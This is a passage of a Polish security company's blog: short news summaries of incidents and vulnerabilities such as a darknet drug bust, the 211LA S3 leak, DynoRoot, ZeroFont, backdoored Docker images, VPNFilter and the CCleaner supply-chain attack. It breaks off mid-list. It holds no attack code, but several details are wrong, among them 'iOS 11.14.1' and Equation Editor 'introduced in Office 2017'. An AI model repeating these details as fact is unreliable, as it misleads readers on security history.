W chwili aresztowania zatrzymano 8 osób. Zarekwirowano również ponad 100 typów używek, kilkaset tysięcy pojedynczych porcji narkotyków. Przejęto także dwie linie produkcyjne w pełni wyposażone i ze sprzętem wartym około 12 milionów Euro. Dodatkowo skonfiskowano 700 000 Euro w gotówce, 1 600 000 Euro z konta bankowego w Hiszpanii. Skonfiskowano również 510 BTC (warte około 5 508 000 Euro), IOTA warte około 137 000 Euro oraz lumen warte około 30 000 Euro.

Sam proces konfiskaty można obejrzeć na profilu EUROPOLtube

Wielki biznes w sieci Darknet

Handel narkotykami to jedną piątą zysków z przestępczości zorganizowanej. Rynek używek syntetycznych wart jest miliardy euro rocznie. Stąd liczba producentów i handlarzy wciąż rośnie. W ciągu ostatniej dekady nielegalne rynki internetowe zmieniły sposób kupowania i sprzedawania narkotyków. Działalność przestępcza w Darknet stała się bardziej innowacyjna i trudniejsza do namierzenia. Darknet zapewniają w dużej mierze anonimową platformę do handlu różnymi nielegalnymi towarami i usługami. Europol szacuje, że około dwie trzecie ofert na rynkach Darknet jest związanych z narkotykami.

Jak zwalczać nielegalny handel w Darknecie

Walka z przestępczością w wirtualnym świecie jest niezwykle trudna. Z cyfrowej rzeczywistości korzystają duże, dobrze zorganizowane i międzynarodowe grupy przestępcze. Sam temat jest przedmiotem wielu analiz takich jak raport „Narkotyki i Darknet” opisujący ten rynek, zagrożenia z niego płynące oraz sposoby reakcji na ten problem.

Źródło: Europol

Potrzebujesz rozwiązań cyberbezpieczeństwa dla firmy – skontaktuj się z nami.

Cyber blog

Virtual Personal Assistants (VPA) – uważajmy, co mówimy

Jakiś czas temu słyszeliśmy o przypadku w którym Amazon Alexa nagrała rozmowę/kłótnię dwójki ludzi i wysłała ją do ich znajomych. Jak dowodzą badacze z kilku amerykańskich uniwersytetów urządzenia Virtual Personal Assistants (w skrócie VPA), do których można zaliczyć Alexe oraz Asystenta Googla, stanowią całkiem ciekawy wektor ataku. Poniżej kilka przykładów, jak można by było takie urządzenie wykorzystać w celach niekoniecznie zgodnych z prawem.

#1 – Jedno VPA, by rządzić innymi

Urządzenia VPA nie rozpoznają czy polecenia wymiawia człowiek czy inny komputer np tłumacz googlowy – więc teoretycznie można by było stworzyć sytuację w której maszyna wydawała by polecenia innej maszynie.

#2 – VPA jako podsłuch

Amazon udostępnił Alexa Skill Blueprints – zestaw narzędzi pozwalających niezależnym programistą na tworzenie własnego oprogramowania pod Alexe. To daje możliwość stworzenia złośliwego oprogramowania, które – oprócz robienia pożytecznych rzeczy – będzie “wyłapywało” konkretne słowa i przekazywało jej przestępcą.

#3 – VPA nie słyszy dokładnie

Dla człowieka “Capital One please” i “Capital One Police” to dwa różne sformułowania. Dla Alexy (jeszcze) nie. Oznacza to, że można rzeczywistym poleceniem uruchomić np. dodatkowo złośliwą aplikację o podobnie brzmiącej nazwie. To prosty ale nadal skuteczna metoda znana np. z przypadków stron interentowych. Tam wystarczy jedna litera różnicy w nazwie, aby przecięty człowiek tego nie zauważył.

Źródło: Understanding and Mitigating the Security Risks of Voice-Controlled Third-Party Skills on Amazon Alexa and Google Home, Google

Potrzebujesz rozwiązań cyberbezpieczeństwa dla firmy – skontaktuj się z nami.

Cyber blog

Wyciek danych z Amazona AWS S3 przez błąd ludzki

Według raportu Gartnera od 70% do 99% przypadków wycieków danych nie jest spowodowanych atakiem hakerskim lecz niefrasobliwością użytkowników. Zwykły użytkownik niejednokrotnie jest większym zagrożeniem dla swoich danych, niż cyberprzestępca. Dowodem na powyższe stwierdzenie może być duży wyciek danych z usługi Amazona AWS S3. Zdarzenie miało miejsce w marcu 2018 roku.

Organizacja „211LA” (pełna nazwa „211 Los Angeles”) na co dzień zajmuje się pomocą ludziom starszym, przemocą domową oraz innym sprawami społecznymi. Organizacja ta przechowywała bazę danych swoich podopiecznych właśnie na AWS S3. Backup tej bazy znajdował się też na AWSie. Problem polegał na tym, że folder z kopią bazy miał źle ustawione uprawnienia dostępu i jego zawartość okazała się publicznie dostępna.

Dane wrażliwe dostępne dla każdego

200 000 wierszy szczegółowych notatek, w tym opisów przypadków przemocy wobec osób starszych, wykorzystywania dzieci i prób samobójczych. Wśród danych ujawniono pełne nazwiska, numery telefonów, adresy, a nawet 33 000 pełnych numerów ubezpieczenia społecznego. Dodatkowo wyciekły dane takie jak: adresy email i skróty haseł pracowników i współpracowników organizacji. Hasła były szyfrowane za pomocą MD5.

Konkluzja

Jeżeli chce się przechowywać krytyczne dane w chmurze to naprawdę należy zadbać o ich bezpieczeństwo. A ono zaczyna się u podstaw – dostęp do nich powinien być wtedy mocno ograniczony.

Źródło: UpGuard

Potrzebujesz rozwiązań cyberbezpieczeństwa dla firmy – skontaktuj się z nami.

Cyber blog

USB Restricted Mode w iOS 11.14.1 da się pokonać

W poniedziałek, 9 lipca, Apple udostępniło aktualizację dla wszystkich swoich systemów. Jednak największe zainteresowanie wzbudziła nowa wersja iOS oznaczona numerami 11.14.1. Wśród wielu poprawiek wszyscy zwrócili uwagę na dwie nowe funkcje – USB Restricted Mode (w polskich wersjach systemu oznaczone jako Akcesoria USB) oraz automatycznego kasowania zawartości telefonu po 10 nieudanych próbach logowania. Bez wątpienia to odpowiedź na pojawienie się takich urządzeń jak GreyKey, które skutecznie przełamywały hasła blokujące telefony.

Jak działa USB Restricted Mode

Najprościej mówiąc urządzenie blokuje możliwość odczytania zawartości telefonu po godzinnym braku aktywności. W teorii oznaczało to, że podłączenie urządzenia do portu USB-C wymagało odblokowania telefonu. Jednak już kilkanaście godzin po wydaniu aktualizacji okazało się, że jednak jest “ale”. Otóż zabezpieczenie można obejść wykorzystując np. zwykłą przejściówkę np. na zwykłe USB.

Błąd czy jednak kompromis

Wiele osób zadaje sobie pytanie, czy to luka w systemie czy jednak kompromis pomiędzy bezpieczeństwem a wygodą. iPhone często służą nam jako źródło muzyki w wielogodzinnych podróżach. Wtedy co godzinę musielibyśmy ponownie wpisywać hasło, aby dalej w radio słyszeć swoją ulubioną muzykę. Podobnie byłoby przy ładowaniu urządzenia z gniazdka elektrycznego.

Być może Apple juz pracuje nad nowszą wersją USB Restricted Mode, która poradzi sobie z tym “problemem”. Nie oznacza to jednak, że użytkownicy iPhone nie mogą skutecznie zablokować dostępu do swoich telefonów. Wg. informacji podanych na portalu niebezpiecznik.pl tryb USB Restricted Mode można włączyć na żądanie,  uruchamiając tryb SOS mode.

Źródło: MacRumors

Potrzebujesz rozwiązań cyberbezpieczeństwa dla firmy – skontaktuj się z nami.

Cyber blog

Trickbot Malware – atak poprzez załącznik w formacie RTF

Na forum SANS ISC InfoSec opublikowano artykuł dot. malware-u Trickbot, który jest dystrybuowany przez wiadomości elektroniczne. Autor zwraca uwagę, iż aktualnie malware wykorzystuje pliki RTF wykorzystujące podatność CVE-2017-11882 – poprzednio były to pliki PDF. Wspomniana podatność dotyczy znanego już rozwiązania Microsoft Equation Editora (wprowadzonego w Office 2017 i zablokowanego w styczniu 2018 roku).

Warto zapoznać się z artykułem, gdyż jego autor – Brad Duncan – dość dokładnie opisuje sposób infekcji tego malware-a. Taka informacja może być w szczególności przydatna dla analityków identyfikujących zagrożenia w infrastrukturze.

Remediacja wskazywana przez autora to przede wszystkim stosowanie aktualizacji, jak również rozwiązania takie jak AppLocker (funkcja dostępna w systemach Microsoftjuż od wersji Windows Server 2008 R2 oraz Windows 7) oraz Software Restriction Policies (SRP).

Źródło: SANS ISC InfoSec

Potrzebujesz rozwiązań cyberbezpieczeństwadla firmy – skontaktuj się z nami.

 

Cyber blog

Raport National Exposure Index – zagrożenia w sieci

Rapid7 Labs opublikowało kolejny raport pod nazwą National Exposure Index. Jest to cykliczny raport, który jest publikowany od 2016 roku. Co do zasady jest to raport, który ma przedstawiać porównywalne dane w zakresie zagrożeń pojawiających się w sieci Internet.

Raport National Exposure Index co roku trochę inny

Już na pierwszy rzut oka widać, że raportyz każdym rokiem stają się coraz bardziej obszerne (raport z 2016 – 30 str., aktualny – 60 str.). Niestety – dla samej analizy – zmieniają się również zasady tworzenia rankingu. Nie mniej jednak jest to ciekawa lektura, która pozwala zapoznać się z aktualnym trendami zagrożeń z perspektywy Rapid7 Labs.

Raport NEI 2018

Raport NEI 2017

Raport NEI 2016

 

Porównanie HTTP vs HTTPS dla Polski
Źródło – National Exposure Index

 

Poza raportem dostępna jest także interaktywna mapa, z której można zapoznać się aktualną pozycją danego kraju w rankingu na najbardziej narażony kraj na ataki.

Źródło: Rapid7 Labs

Potrzebujesz rozwiązań cyberbezpieczeństwadla firmy – skontaktuj się z nami.

Cyber blog

Nowa usługa od VirusTotal

VirusTotal ogłosił uruchomienie nowej płatnej usługi pod nazwą VirusTotal Monitor.

Subskrybenci, którzy wykupią usługę VirusTotal , będą otrzymywać informacje kiedy ich program został rozpoznany przez oprogramowanie antywirusowe jako malware.

To z kolei pozwoli developerom zarówno oprogramowania wykrytego jako malware,jak i dostawcom antywirusów na wprowadzenie niezbędnych zmian mających na celu wyelimonowanie alarmów typu false-positive.

Cena usługi nie jest na razie znana, aczkolwiek prawdopodobnie koszt usługi będzie uzależniony od subskrybenta. Celem jest by przedmiotowa usługa była dostępna także dla developerów dysponujących skromniejszym budżetem.

Dodatkowe informacje w źródle.

Źródło: BleepingComputer

Potrzebujesz rozwiązań cyberbezpieczeństwa dla firmy – skontaktuj się z nami.

Cyber blog

DHCP Client Command Injection (DynoRoot)

Na stronie ExploitDB opublikowano nowy atak RCE (remote code execution), tym razem do wykorzystania w sieci wewnętrznej.

Metasploit przygotował eksploita, który wykorzystuje lukę w linuksowym kliencie DHCP Client Command Injection (DynoRoot).

DynoRoot w natarciu – odpowiedzi serwera DHCP

Błąd ten otrzymał numer CVE-2018-1111 aka DynoRoot. Według opisu na ExploitDB, w sytuacji gdy atakujący podsłucha odpowiedzi serwera DHCP, może wykonać polecenia z uprawnieniami root-a.

Eksploit został opublikowany 13 czerwca 2018 i ma status zweryfikowany.

Pozostałe informacje m.in. o podatnych systemach operacyjnych znajdują się w źródle informacji.

Źródło: ExploitDB

Potrzebujesz rozwiązań cyberbezpieczeństwa dla firmy – skontaktuj się z nami.

Cyber blog

Fora dyskusyjne m.in. Windows 7, Office 2013 już bez udziału Microsoft

Fora dyskusyjne m.in. Windows 7, Office 2013 już bez udziału Microsoft

Jak podaje Microsoft, od lipca 2018 roku firma ta przestanie aktywnie komentować na oficjalnym forum dyskusyjnym wątki dotyczące kilku z ich schodzących produktów m.in.: Windows 7 oraz Office 2013.

Wśród nich znajdują się również:

  • Windows 8.1, 8.1 RT,
  • Microsoft Security Essentials,
  • Internet Explorer 10,
  • Office 2010, 2013,
  • Surface Pro, Surface Pro 2, Surface RT, Surface 2,
  • Microsoft Band – temat zostane zablokowany,
  • Forum urządzeń mobilnych,
  • Zune – temat zostanie zablokowany,

Stare produkty Microsoft wciąż popularne

Decyzja o wycofaniu się z aktywnego udziału na forum ma prawdopodobnie związek ze zbliżającym się końcem wsparcia technicznego na w/w produkty (dla Windows 7 jest to 14/01/2020). Warto odnotować, że w maju 2018 roku to właśnie Windows 7 pozostawał najczęściej wykorzystywanym systemem operacyjnym firmy z Redmond. Wg. danych NetMarketShare działało na nim 41,79% użytkowników popularnych “okienek”. Z Windows 10 z kolei korzysta tylko 1/3 użytkowników (34,74% udziału w rynku).

Zaskakujący jest fakt, że 5% komputerów stacjonarnych nadal działa na Windows XP. Dla przypomnienia – wsparcie dla tego systemu zostało definitywnie zakończone ponad 4 lata temu tj. 8 kwietnia 2014 roku. W kwestii bezpieczeństwa jak i samego rozwoju technologicznego to już epoka.

Źródło: Microsoft Community

Potrzebujesz rozwiązań cyberbezpieczeństwa dla firmy – skontaktuj się z nami.

Cyber blog

Microsoft Office 365 – Atak ZeroFont

Tym razem nowy atak dotyczy użytkowników rozwiązania Microsoft Office 365. Cyberprzestępcy znaleźli sposób na oszukanie zabezpieczeń stosowanych przez Microsoft, których zadaniem było zatrzymanie wiadomości zawierających typowe słowa dla phishing-u. W tym celu wykorzystali technikę nazwaną przez security resercherów jako atak ZeroFont. Część tekstu, która ma oszukać rozwiązania bezpieczeństwa, jest napisana z wykorzystaniem czcionki o zerowej wielkości.

Skutki metody ZeroFont

Odbiorca wiadomości widzi tekst taki, jak zaplanował atakujący. Natomiast systemy bezpieczeństwa ‘widzą’ zupełnie inny tekst. I to pomimo, iż jest to ta sama wiadomość. Metoda ataku prosta, ale – niestety – skuteczna.

Źródło: SecurityWeek

Potrzebujesz rozwiązań cyberbezpieczeństwa dla firmy – skontaktuj się z nami.

Cyber blog

Repozytorium Docker jako kopalnia kryptowalut

Ataki na cyfrowe repozytorium (miejsce, w którym dokumenty i pliki przechowywane są w sposób uporządkowany i udostępniane są publicznie) nie są nowym tematem. Nie mniej jednak takie ataki są zwykle dość spektakularne. Jakby nie było w trakcie takiego działania atakowany jest serwer, z którego korzysta wiele osób i który zawiera ciekawe informacje.

Repozytorium Docker jako kopalnia kryptowalut

O takim właśnie ataku napisał Catalin Cimpanu z Bleeping Computer. Tym razem chodzi o repozytorium (w skrócie repo) Dockera. Na nim użytkownik o pseudonimie ‘docker123321’ zamieścił 17 obrazków umożliwiających uzyskanie reverse shell-a oraz instalację koparek krypotwalut na serwerach użytkowników.

Obrazki były umieszczane począwszy od 25 maja 2017 roku do 7 lutego 2018 roku. Część z tych obrazków zostało pobranych ponad milion razy.

Pierwsze informacje o tym, że coś jest nie tak pojawiły się we wrześniu 2017. Jednak dopiero w maju 2018 r. pliki te zostały usunięte z repozytorium. I to jest dobra informacja, ale tylko dla tych użytkowników, którzy nie pobrali zainfekowanych plików.

Wykopano prawie 71 000 USD

Ile udało się wykopać kryptowaluty w tym czasie? Specjaliści z zespołu Kromtech szacują, że było to 544.74 w kryptowalucie Monero. Przy kursie około 130 dolarów za sztukę daje to kwotę prawie 71 000 USD.

Szczegółowe informacje o skutkach ataku dla użytkowników znajdują się w artykule ’17 Backdoored Docker Images Removed From Docker Hub’ – link w źródle.

Źródło: Bleeping Computer

Potrzebujesz rozwiązań cyberbezpieczeństwa dla firmy – skontaktuj się z nami.

Cyber blog

Rosyjska grupa przestępcza Sofacy ( APT28 ) zmienia taktykę

Rosyjska grupa przestępcza Sofacy APT28 występuje na „rynku” od wielu lat. Wcześniej była znana pod takimi nazwami jak APT28, Sednit, Fancy Bear, Pawn Storm, Tsar Team. Do tej pory grupa ta tworzyła wyspecjalizowany malware, dedykowany jedynie do kilku specjalnie wybranych jednostek w danej organizacji. Sposoby infekcji były wtedy mocno
personalizowane.

Specjaliści z PaloAlto wykryli ich nową kompanię, gdzie przestępcy zmienili taktykę. Z walki w cieniu na tzw. “wystrzał z shotgana”. Ich nowa kampania nakierowana jest na wszystkie zagraniczne organizacje. Potencjalne ataki te jest łatwo wykryć. Grupa zaczęła wysyłać maile ze złośliwymi załącznikiami (pliki .doc z macro czy zawierające podatności typu DDE). Ofiary w ten sposób instalowały trojana zezwalający na zdalny dostęp – Koadic, albo jedną z wersji Zebrocy.

Komentarz:

Jeżeli do tej pory grupa przestępcza starała się działać w cieniu i nagle zmieniła taktykę, w której jej ruchy są mocno widoczne, istnieje szansa, że może to być jakaś zasłona dymna przed inną akcją. Albo po prostu grupa testuje nową strategię.

Źródło: Bleeping Computer

Potrzebujesz rozwiązań cyberbezpieczeństwa dla firmy – skontaktuj się z nami.

Cyber blog

Ticketmaster – zbyt wysoka cena za bilet

Ticketmaster – zbyt wysoka cena za bilet

Użytkownicy serwisu Ticketmaster, dokonujący transakcji pomiędzy wrześniem 2017 a 23 czerwca 2018, zostali narażeni na kradzież ich danych. Moduł live chat (dostarczony przez firmę Inbenta) stosowany na niektórych stronach serwisu serwował złośliwy kod. Przechwytywał on dane logowania do serwisu a także informacje o płatnościach.

Według informacji Ticketmaster kradzież danych objęła ok. 5% bazy klientów i nie dotyczy użytkowników z Ameryki Północnej.

informacja o wyjaśnieniach dotyczących wycieku danych

Stanowisko firmy w tej sprawie dostępne jest tutaj.

Źródło: Bleeping Computer

Potrzebujesz rozwiązań cyberbezpieczeństwa dla firmy – skontaktuj się z nami.

Cyber blog

Advanced Battery Saver – oszczędność energii i złodziej danych w jednym

Baterie w telefonach komórkowych bardzo szybko się rozładowują. Nie dziwi więc fakt, że dużą popularnością cieszą się aplikacje ograniczające zużycie energii. Jedna z takich aplikacji, która ostatnio pojawiła się w sklepie Google Play, ma dodatkową funkcjonalność. Chodzi o Advanced Battery Saver (już niedostępna). Jest to możliwość odczytywania danych znajdujących się w telefonie takich jak smsy, dane z przeglądanych stron www, kontakty lub lokalizacja i przekazywanie ich do serwera C&C.

Advanced Battery Saver – automatyczna instalacja “aktualizacji”

Do instalacji aplikacji dochodzi w wyniku wejścia użytkownika na złośliwe strony, które wyświetlają okno z komunikatem o konieczności ściągnięcia tej aplikacji. To następuje bez względu na to, czy użytkownik naciśnie przycisk Anuluj czy Instaluj.

Pierwsze informacje mówią, że zainfekowanych może być ponad 60 000 urządzeń działających na systemie Android.

Źródło: Threat Post

Potrzebujesz rozwiązań cyberbezpieczeństwa dla firmy – skontaktuj się z nami.

Cyber blog

Cortana wytrychem do Windows 10 oraz Windows Server

Cortana wytrychem do Windows 10 oraz Windows Server

W ramach ostatniego Patch Tuesday Microsoft opublikował poprawkę m.in. do asystenta Cortana o numerze CVE-2018-8140. Jest to bardzo ciekawe CVE (Common Vulnerabilities and Exposures). Umożliwia on nieautoryzowane działanie na systemach Windows 10 oraz Windows Server (Server Core Installation). Luka została zgłoszona w kwietniu 2018 do firmy Microsoft przez Cedrica Cochin z McAfee.

Jak przebiega atak z wykorzystaniem luki w Cortana

Pomimo zablokowanego ekranu użytkownik mógł wykorzystać systemowego asystenta głosowego czyli tzw. Cortane. Bleeping Computer opublikował ciekawy artykuł, w którym autor przedstawił możliwe scenariusze ataku.
Jako remediację należy wykonać update ww. systemów Windows lub poprostu wyłączyć asystenta. Tak, by nie wykonywał poleceń głosowych, gdy ekran jest zablokowany.

Źródło: BleepingComputer

Potrzebujesz rozwiązań cyberbezpieczeństwa dla firmy – skontaktuj się z nami.

Cyber blog

Amazon Fire TV jako koparka kryptowalut

Amazon Fire TV jest małym urządzeniem podłączanym do urządzeń mobilnych z systemem Android. Pozwala przekazywać obraz (z ang. streaming) do telewizorów czy innych wyświetlaczy. Urządzenie współdziała z każdą wersją Androida, ale oprogramowanie nie jest certyfikowane przez Google.

Koparka na Amazon Fire TV

Ostatnio został wykryty robak ADB.miner, ukrywający się w aplikacjach tworzonych pod Amazon Fire. Program po zainstalowaniu samodzielnie pobierał dodatkowe pliki o nazwie „com.google.time.timer”. W efekcie zainfekowane urządzenie rozpoczynało pracę jako koparka kryptowalut.

Oznaki zainfekowania

Jedyną widoczną oznaką zainfekowania – poza tzw. lagami (widocznymi opóźnieniami w transmisji obrazu) – był pojawiający się czasami komunikat w lewym dolnym rogu o treści „Test”. Jeśli użytkownik nie korzystał z Amazon Fire TV (czyli urządzenie pozostawało włączone), aplikacja wykorzystywała zasoby urządzenia do kopania kryptowalut.

Jedynym pewnym sposobem pozbycia się ADB.miner jest reset urządzenia do ustawień fabrycznych.

Źródło: ExtremeTech

Potrzebujesz rozwiązań cyberbezpieczeństwa dla firmy – skontaktuj się z nami.

Cyber blog

InvisiMole – spyware doskonały?

Badacze z ESET wykryli na kilkudziesięciu komputerach rosyjskich i ukraińskich użytkowników złożony, modułowy spyware – InvisiMole. Działał on prawdopodobnie od 2013 roku.

InvisiMole – 2 dopasowane moduły

Malware posiada dwa główne moduły. Każdy z nich ma inne funkcje, które wzajemnie się uzupełniają. Pierwszy z nich – RC2FM – zawiera 15 komend, w tym uruchamianie kamery i modyfikacje konfiguracji systemu, a także wykorzystanie ustawień proxy do komunikacji z C&C. Drugi moduł – RC2CL – jest znacznie bardziej zaawansowany. Wśród ponad 80 obsługiwanych komend jest m.in. manipulowanie wpisami rejestru, uruchamianie plików, wyłączanie UAC, firewalla systemowego, a także rejestrowanie obrazu i dźwięku z kamery i mikrofonu zainfekowanej stacji i przesyłanie danych do serwera C&C. Dodatkowo moduł został wyposażony w możliwość autousuwania, aby utrudnić analizę pozyskanych przez malware danych.

W ukryciu dzięki małej szkodliwości

Szkodliwe oprogramowanie wykorzystuje tylko kilka technik w celu uniknięcia wykrycia i analizy. Dlaczego więc tak długo pozostawało niewykryte? Otóż zostało wykorzystane przeciwko bardzo małej liczbie wartościowych celów. I dzięki temu było w stanie pozostać poza zainteresowaniem systemów bezpieczeństwa przez co najmniej pięć lat.

Źródło: Bleeping Computer

Potrzebujesz rozwiązań cyberbezpieczeństwa dla firmy – skontaktuj się z nami.

Cyber blog

Coinrail – południowokoreańska giełda kryptowalut zhakowana

Południowokoreańska giełda kryptowalut Coinrail ogłosiła, że stała się celem ataku. W jego wyniku została skradziona duża ilość tokenów ICO (Initial Coin Offerings) dla walut Pundi X, NPER i Aston. Giełda operuje również bardziej popularnymi kryptowalutami jak Bitcoin czy Ethereum. Na szczęście dla ich użytkowników nie były one głównym źródłem obrotów tego podmiotu.

Coinrail chce zamrozić skradzione środki

W pierwszej kolejności portal został przestawiony na tryb serwisowy oraz przeniósł pozostałe środki do portfeli off-line. Dodatkowo zamrożone zostały niektóre z adresów, z których przeprowadzony został atak

Szacowanie strat

Przedstawiciele Coinrail nie podali oficjalnie wysokości strat. Jednak na popularnym forum bitcoinowym pojawiła się analiza sugerująca wysokość pomiędzy 30 a 40 milionów dolarów.

Źródło: Bleeping Computer

Potrzebujesz rozwiązań cyberbezpieczeństwa dla firmy – skontaktuj się z nami.

Cyber blog

Amerykańskie RODO a może rodeo z Echo Alexa?

Obecnie w związku z RODO, tematy przetwarzania danych osobowych są bardzo na czasie. Jak wiemy RODO nie obejmuje swoim zakresem krajów poza Europą. Choć zapewne byłoby to mocno wskazane w Stanach Zjednoczonych i w przypadku Echo Alexa.

Potwierdza to przypadek pewnej rodziny amerykańskiej, która korzysta z Echo Alexa. To smart-głośnik zarządzający urządzeniami w domu, z którymi jest zintegrowany. Okazuje się, że Echo  zarejestrowała rozmowę w domu i przekazała jej treść dzwoniąc na losowy numer telefonu z książki adresowej. Trudno to sobie wyobrazić i wytłumaczyć, ale producentowi (Amazon) się udało.

Echo Alexa – nie rozmawiaj o nim

Echo aktywowała się na słowo Alexa usłyszane w prowadzonej rozmowie. Później usłyszała ‘wyślij wiadomość’ a więc zapytała do kogo po czym znowu usłyszała wskazanie osoby w książce adresowej. Alexa poprosiła o potwierdzenie polecenia, które ponownie wychwyciła z rozmowy.

Słysząc tę historię, odnosi się wrażenie, że użytkownicy, producenci i ich produkty żyją w różnych światach, w których nikt nikogo nie kontroluje a pojęcia odpowiedzialności i prywatności nie istnieją.

Źródło: Kiro7

Potrzebujesz rozwiązań cyberbezpieczeństwa dla firmy – skontaktuj się z nami.

Cyber blog

VPNFilter – malware, który może zagrozić 500 000 urządzeniom

VPNFilter pozwala na infekcje routerów SOHO

Badacze Cisco Talos odkryli złośliwe oprogramowanie, które nazwali VPNFilter. Pozwala ono na infekcje routerów SOHO. Na ten moment ujawniono, że problem dotyczy urządzeń takich firm jak: Linksys, Mikrotik, Netgear, Qnap oraz Tp-Link.  Szczególną aktywności złośliwego oprogramowania zaobserwowano na Ukrainie. Jednak szacuje się, że na całym świecie narażonych jest około 500 000 urządzeń.

Nowe sposób działania VPNFilter

Innowacyjnym rozwiązanemu w tym oprogramowaniu jest fakt, że modyfikuje ono firmware zarażanego urządzenia. Oznacza to, że restart nie powoduje usunięcia złośliwego kodu.

Przechwycić transmisję

Oprogramowanie ma budowę modułową. Wnioski z odkrytych modułów wskazują, że cyberprzestępcy mogą przechwytywać transmisję przechodzącą przez te urządzenia i wychwytywać interesujące ich dane np. loginy, hasła itp.​

Źródło: Talos Intelligence Blog

Potrzebujesz rozwiązań cyberbezpieczeństwa dla firmy – skontaktuj się z nami.

Cyber blog

RODO – pierwsze próby jego obejścia

25 Maja 2018 wchodzi wżycie ustawa RODO. Jeszcze na dobre nowa ustawa nie weszła w życie, a dużo serwisów internetowych już znalazło sposób by ją obejść.

Wiele serwisów, przy pierwszych odwiedzinach strony wyświetla komunikat, że w związku z ustawą RODO, proponują nam możliwość, by te serwisy zbierały o nas informacje, jednak na to musimy sami się jawnie zgodzić. Bez jednoznacznej naszej zgody, serwisy nie mogą zbierać o nas informacji…

RODO w praktyce

W wielu serwisach, wchodząc na ich stronę, pojawia się nowy regulamin. Przy którym mamy trzy możliwości:

  • Zaakceptować go, czyli zgadzamy się na to, by zbierali o nas informację.
  • Ustawienia zaawansowane – możliwość wybiórczego odznaczenia, by nie zbierali o nas wszystkich informacji.
  • Wybrać „x”, opuszczenie regulaminu i (w domyśle) zgodzenie się na treść regulaminu.

Jak wynika z artykułu, dużo osób nabiera się na ten prosty trik. Myśląc, że nieprzeczytanie/ brak zapoznania z regulaminem, zwalnia ich z jego przestrzegania, użytkownicy często zapominają, że brak jawnego zaznaczenia „brak zgody”, może być interpretowane z wyrażeniem zgody. Istnieje ryzyko, że kolejną próbą obejścia RODO będzie jednoznaczne stwierdzenie: albo użytkownik się godzi na nowy regulamin, albo nie korzysta z serwisu.

Źródło: ZaufanaTrzeciaStrona

Potrzebujesz rozwiązań cyberbezpieczeństwa dla firmy – skontaktuj się z nami.

Cyber blog

Antivirus Evasion – obfuskacja msiexec

Na forum SANS ISC InfoSec opisano kolejny przypadek infekcji, która była wykryta przez jedynie przez kilka antywirus-ów. Z perspektywy atakującego jest to bardzo dobry wynik. Tym bardziej że wg. VirusTotal-a oprogramowanie, które wykryło złośliwy plik, nie pochodziło od najbardziej znanych producentów. Niestety nie ma informacji, jakie silniki pierwsze zidentyfikowały złośliwy kod.

Obfuskacja marko w instalatorze Windows

Technika, z której skorzystali atakujący to obfuskacja (zaciemnienie kody) makro w dokumencie Word-a. Analiza zdeobfuskowanego kodu ujawnia, iż atakujący wykorzystali instalator Windows ‘msiexec.exe’. Jego celem był ściągnięcie pliku ze wskazanej strony. Następnie pobrany plik komunikował się z kolejnym adresem http. Efekty – wstrzyknięcie złośliwego kodu na komputer ofiary. Resztę można dopowiedzieć sobie samemu…

Szczegółowy opis jak zwykle w linku poniżej.

Na koniec warto zwrócić uwagę na jeszcze jeden fakt. Że nie tylko topowe oprogramowanie antywirus-owe potrafi skutecznie trafnie wskazywać złośliwe pliki.

Źródło: SANS ISC InfoSec

Potrzebujesz rozwiązań cyberbezpieczeństwa dla firmy – skontaktuj się z nami.

Cyber blog

Meksykański botnet w natarciu

Na blogu Trend Micro opublikowano informacje o nowym botnet podobnym do Mirai.

Jak działa botnet

Jego aktywność została zauważona w Meksyku. Botnet skanuje domowe rutery korzystające ze standardu GPON (ang. Gigabit Passive Optical Network), do których można uzyskać dostęp za pomocą defaultowych danych uwierzytelniających. Ale nie tylko one są w kręgu zainteresowania botnetu. Celem były także inne rutery i kamerki internetowe, do których można było uzyskać dostęp ww. opisany sposób.

W kolejnym kroku podejmowana była próba wykorzystania dwóch podatności: CVE-2018-10561 oraz CVE-2018-10562. Jeśli działanie to zakończyło się sukcesem, atakujący miał możliwość zdalnego wykonania kodu (RCE) na przejętym urządzeniu.

Meksykański trop

Aktywność botnetu została zauważona w dniach 8-10 maja 2018 i pochodziła z 3845 adresów IP zlokalizowanych w Meksyku. Badacze z Trend Micro odkryli, że większość ww. adresów IP należy do jednej z największych firm telekomunikacyjnych w Meksyku.

Niestety jest to kolejny przykład, że nadal wielu użytkowników nie wykonuje nawet najbardziej elementarnych czynności związanych ze zmianą standardowego hasła w swoich urządzeniach.

Źródło: Tren Micro Blog

Potrzebujesz rozwiązań cyberbezpieczeństwa dla firmy – skontaktuj się z nami.

 

Cyber blog

Pliki SYLK jak sposób dystrybucji malware-u

Na forum SANS ISC InfoSec opisano ciekawe wykorzystanie plików SYLK (z rozszerzeniem .slk). Jest to jeden ze sposobów na ominięcie detekcji przez rozwiązania antywirusowe.

Czym jest plik SYLK

Plik SYmbolik LinK, inaczej nazywany SYLK (z rozszerzeniem .slk) jest formatem Microsoftowym wykorzystywanym do wymiany danych pomiędzy aplikacjami. Najczęściej używają go arkusze kalkulacyjne.

Ikonka pliku bardzo przypomina ikonę Excel-ową. W związku z tym atak poprzez pliki SYLK może oszukać zarówno program antywirusowy, jak i użytkownika.

wygląd pliku .slk
wygląd pliku .slk

Szczegóły ataku wraz z aktualnie znanymi hasłami plików dostępne są w materiale źródłowym.

Źródło: SANS ISC InfoSec

Potrzebujesz rozwiązań cyberbezpieczeństwa dla firmy – skontaktuj się z nami.

Cyber blog

CCleaner – historia 2 mln infekcji, aby dotrzeć do 40 komputerów

Pół roku temu pojawiła się informacja o ataku na firmę Pirform, producenta popularnego programu CCleaner. Atak wzbudził duże zainteresowanie z dwóch powodów. Po pierwsze – atak odbył się z wykorzystaniem oficjalnego procesu aktualizacji oprogramowania. Użytkownicy pobierając – wydawać się by mogło – standardową aktualizację, wpuszczali atakujących na swoje komputery. Po drugie – aktualizacja została pobrana 2 miliony razy.

Dopiero z czasem pojawiły się informacje, jak „ciekawy” i skomplikowany był to atak. Ciekawy, bo właściwym celem hakerów było 40 stacji roboczych (0,004% wszystkich zainfekowanych) należące do raptem 12 firm.

Pół roku po ataku na konferencji RSA w San Francisco Ondrej Vlcek – wiceprezes i CTO Avast – zaprezentował analizę tamtego wydarzenia. Krok po kroku pokazał, w jaki sposób oficjalne mechanizmy stały się narzędziem do zainfekowania aż tylu użytkowników na raz.

Atak na CCleaner krok po kroku

  1. Przejęcie jednego z komputerów poprzez zalogowanie się na użytkownika korzystającego z TeamViewer. Atakujący znali login i hasło. Prawdopodobnie użytkownik posiadał ten sam login i hasło w wielu miejscach a wyciek nastąpił z innej bazy danych.
